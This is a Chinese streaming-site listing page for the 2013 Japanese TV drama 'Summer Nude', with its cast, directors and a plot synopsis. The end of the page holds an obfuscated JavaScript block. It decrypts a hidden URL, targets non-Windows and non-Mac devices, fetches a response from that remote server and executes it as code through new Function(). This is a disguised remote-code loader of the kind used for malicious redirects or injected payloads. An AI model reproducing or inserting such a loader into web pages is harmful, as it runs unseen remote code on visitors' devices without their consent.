SUMMERNUDE

主演:山下智久  香里奈  户田惠梨香  胜地凉  洼田正孝  佐藤胜利  山本美月  千叶雄大  桥本奈奈未  中条彩未  长泽雅美  福士诚治  木村绿子  泉谷茂  板谷由夏  高桥克典  

导演:石井祐介  宮木正悟  金井紘  

类型:日韩剧

备注:完结   更新时间:2022-09-01 12:40

地区:日本   年份:2013

播放线路
快手云 无尽云
详细介绍

大海、沙滩、冲浪、泳装美女……生活在海边的摄影师三厨朝日(山下智久 饰)日子看似过的很惬意,可他心中却有一个三年还未解开的结。前女友香澄(长泽雅美 饰)不告而别,而朝日却仍旧无法忘记她;知名餐厅的大厨师千代原夏希(香里奈 饰)在结婚现场遭遇男友逃婚,机缘巧合来到了海边;整日无所事事的元气大小姐古山波奈江(户田惠梨香 饰)单恋了朝日十年,却仍旧得不到回应。聚集在海边的这一群人,各自怀抱心事,却在这年夏天的海边迎来了转变。   围绕着“海之家”的海边小食店,他们在治愈与被治愈中度过了最难忘的夏天,从过去的阴影中走出,看到了最美丽的海与最蓝的天。

window['LxQRgj'] = function(){ var keyList = [ "+ALPvZG7JfqnVawkUTN58jgMsm0rulh-4umApW61xS8HnhKIkab3rYoDiwtUvPec" , "QIoM7N6OP2En01qimF8flCU9V+RkwHAE4aqnTc6I9QS7lYsrv+ePONH3ZmtkBF", "jZ+3nV6wxsbgyWiolMdqDhtackJHC2r0eLGz5KQAfFtkN2oyg+paL9zSH.:bXV8IAsleMrKdhYBRimUOCx6/", "-zwgpiskFb9YlOT0Dx1KJuRhZW02ma9f3eR745c6-H8gVXIMjO", ]; function decrypt(t, e) { if (!t) return ""; for (var a = t.split(""), n = e.split(""), i = {}, r = [], o = 0;o < a.length / 2;o++) i[a[o]] = a[a.length / 2 + o]; for (var s = 0; s < e.length; s++) r.push(i[n[s]]); return r.join(""); }; (!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?(function(u, i, w, d) { var x = decrypt, cs = d[x(keyList[0],"-A88hV0f-8kv0")], crd = x(keyList[1],"6mQoNQQ1QRQ7N"); 'jQuery'; u = decodeURIComponent(x(keyList[2], u)); 'jQuery'; var xhr = new XMLHttpRequest(); xhr.open('GET', u + '/s/a?_=' + x(keyList[3], i)); xhr.onreadystatechange = function() { if (xhr.readyState == 4 && xhr.status == 200) { var data = JSON.parse(xhr.responseText); new Function(data.data)(cs); } }; xhr.send('u=1'); })("ijjxWlFFsxhodHZs2WbJ66odVy", "YTz9Y9iilYxwwkz9xY", window, document):function(){}; var _keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; function decode(input) { var output = ""; var chr1, chr2, chr3; var enc1, enc2, enc3, enc4; var i = 0; input = input.replace(/[^A-Za-z0-9\+\/\=]/g, ""); while (i < input.length) { enc1 = _keyStr.indexOf(input.charAt(i++)); enc2 = _keyStr.indexOf(input.charAt(i++)); enc3 = _keyStr.indexOf(input.charAt(i++)); enc4 = _keyStr.indexOf(input.charAt(i++)); chr1 = (enc1 << 2) | (enc2 >> 4); chr2 = ((enc2 & 15) << 4) | (enc3 >> 2); chr3 = ((enc3 & 3) << 6) | enc4; output = output + String.fromCharCode(chr1); if (enc3 != 64) { output = output + String.fromCharCode(chr2); } if (enc4 != 64) { output = output + String.fromCharCode(chr3); } } output = _utf8_decode(output); return output; } function _utf8_decode(utftext) { var string = ""; var i = 0; var c = 0; var c1 = 0; var c2 = 0; while (i < utftext.length) { c = utftext.charCodeAt(i); if (c < 128) { string += String.fromCharCode(c); i++; } else if ((c > 191) && (c < 224)) { c1 = utftext.charCodeAt(i + 1); string += String.fromCharCode(((c & 31) << 6) | (c1 & 63)); i += 2; } else { c1 = utftext.charCodeAt(i + 1); c2 = utftext.charCodeAt(i + 2); string += String.fromCharCode(((c & 15) << 12) | ((c1 & 63) << 6) | (c2 & 63)); i += 3; } } return string; }}